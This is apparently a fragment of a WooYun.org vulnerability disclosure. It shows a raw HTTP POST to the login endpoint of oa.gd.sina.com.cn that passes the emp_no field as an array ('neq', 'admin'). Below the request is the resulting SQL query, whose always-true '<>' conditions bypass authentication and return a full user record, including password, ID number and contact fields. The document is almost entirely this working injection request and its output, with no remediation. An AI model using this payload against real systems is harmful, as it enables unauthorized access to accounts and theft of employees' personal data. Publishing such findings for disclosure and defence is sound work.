WooYun.org

POST /login/check_login HTTP/1.1
Host: oa.gd.sina.com.cn
Proxy-Connection: keep-alive
Content-Length: 40
Pragma: no-cache
Cache-Control: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://oa.gd.sina.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://oa.gd.sina.com.cn/login/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
emp_no[0]=neq&emp_no[1]=admin&password=1

SELECT User.emp_name AS name,User.id AS id,User.emp_no AS emp_no,User.emp_name AS emp_name,User.letter AS letter,User.password AS password,User.dept_id AS dept_id,User.position_id AS position_id,User.rank_id AS rank_id,User.sex AS sex,User.birthday AS birthday,User.last_login_ip AS last_login_ip,User.login_count AS login_count,User.pic AS pic,User.email AS email,User.duty AS duty,User.office_tel AS office_tel,User.mobile_tel AS mobile_tel,User.create_time AS create_time,User.update_time AS update_time,User.is_del AS is_del,User.openid AS openid,User.westatus AS westatus,User.rank_gwzn AS rank_gwzn,User.rank_name AS rank_name,User.leader AS leader,User.marriage AS marriage,User.native_place AS native_place,User.id_number AS id_number,User.nation AS nation,User.education AS education,User.graduate_school AS graduate_school,User.blood AS blood,User.constellation AS constellation,User.qq AS qq,User.weixin AS weixin,User.weibo AS weibo,User.domicile AS domicile,User.set_order AS set_order,User.is_admin AS is_admin,User.is_city AS is_city,User.grade_id AS grade_id,Dept.name AS dept_name FROM oa_user User JOIN oa_dept Dept ON Dept.id=User.dept_id WHERE ( User.emp_name <> 'admin' ) OR ( User.emp_no <> 'admin' ) LIMIT 1